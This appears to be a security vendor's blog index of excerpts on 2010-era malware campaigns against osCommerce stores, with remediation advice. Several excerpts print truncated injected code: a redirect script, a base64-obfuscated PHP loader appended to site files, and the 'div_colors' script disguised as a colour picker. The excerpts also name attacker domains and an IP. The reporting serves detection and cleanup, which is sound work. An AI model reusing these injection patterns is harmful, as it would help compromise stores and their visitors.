Non-Stop Attacks Against osCommerce – Time to Take Action

The malware attacks against osCommerce sites are still going at full force and the site owners have to take action to secure and update their sites as soon as possible. Think about that, with so many valuable targets (online stores) that are not updated and secured, why would they stop attacking now?


*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it to check if it’s clean: Sucuri SiteCheck



Read More

Attacks against osCommerce sites – Spam / google_analytics_obh

It seems that the attacks against osCommerce are not going to stop any time soon. With so many valuable targets (online stores) that are not updated and secured, why would they?


*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it here to check if it’s clean: Sucuri SiteCheck


After all the latest osCommerce malware (div_colors, nt07.in, CreateCSS, willysy.com, etc), we’re seeing an old attack reemerging in full force, and compromising thousands of sites.

The attack is the “__google_analytics_obh” that add hidden links (for Blackhat SEO spam) to the sites. It has been happening for a while, but for the last few days, it just grew in mass scale.

This is what shows up on a compromised site:

Read More

osCommerce malware: Cannot redeclare corelibrarieshandler

We have been posting for a while about attacks targeting and infecting thousands of osCommerce sites (CreateCSS, div_colors, etc) and the importance of keeping it updated and secure.

If you think things have been improving, just for the last few days we started to see many of those osCommerce sites that were hacked, generating errors when trying to access them:

Read More

Continuing attacks against osCommerce: khcol.com

Busy week for osCommerce in terms of malware. First, the div_colors string, then, the CreateCSS string, and now, we are seeing thousands of osCommerce sites infected with a malware pointing to http://khcol.com. This is how it looks like in an infected site:

<script type="text/javascript">document.location = "http://khcol.com/page/?ref=aHR0cDovL2FtZXJ…..tL2FkbWluLw=="

This javascript is generated by the following code added to the bottom of all PHP files in the server:

<?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode(‘a2hjb2wuY29t’);$tf['u']=’http://’.$tf['s']…


Read More

The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
..


Read More

Malware week: The div_colors, CreateCSS and others

We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code.

div_colors

For example, the div_colors malware that infected a lot of osCommerce sites, looks like a javascript color picker. This is how it looks like in an infected site:

if (typeof(redef_colors)==”undefined”) {

var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);


Read More

Weekly malware update – 2010/Jan/14

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

Astro (JS:431) – osCommerce attacks

For the last few weeks, this attack has been the most common, specially targetting osCommerce sites. The following code is added to the bottom of the infected pages:

Read More

osCommerce attacks and nt07.in, nt06.in, etc

We posted yesterday about a series of attacks against osCommerce sites using some russian domains to push the malware (generally the fake AV). We also posted details on how to fix and secure osCommerce to protect against those:

http://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – veriandjsad@comcast.net) that are infecting thousands of sites too.

When they detect an vulnerable site (see previous post by details on that), they drop a backdoor, generally named google*.php that will allow them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):

http://sucuri.net/?page=tools&title=blacklist&detail=1205dd32a1004a65ecc4d4441474217d

It is interesting that in addition to give full shell access to the attackers, it also uses http://redserver.com.ua/code.txt to read the list of domains to use in the attack. Currently, these are the ones being used:

Read More

Continuing attacks against osCommerce sites

We are seeing an increase in the number of osCommerce sites hacked lately, and we recommend anyone using it to take precautions to avoid getting hacked and/or reinfected.

On most of the sites we’ve analyzed so far, the attackers used the file_manager.php vulnerability to hack the site.

If you’re using osCommerce, the first thing you have to do is to install the latest version. Second, remove the file_manager.php file and then rename your admin directory to something else: login via FTP or SSH(recommended) to do so

ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php

Once you do that, modify your configure.php to point the admin folder to the new location.

Read More

Malware update: inininininininin.in (and oscommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by inininininininin.in, comcomcomcomcomcom.com and a few others. All the domains involved are hosted at 91.204.48.45.

These domains were registered by myid37@gmail.com, which is also involved on other malicious activities (serials-keys.com, wincrack.org, search-crack.org,etc).

The infected sites had a large encoded entry added to the file includes/header.php:

echo(base64_decode(“ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD…

Which when decoded, calls http://inininininininin.in/in.php to get what malware to present to the end user:

Read More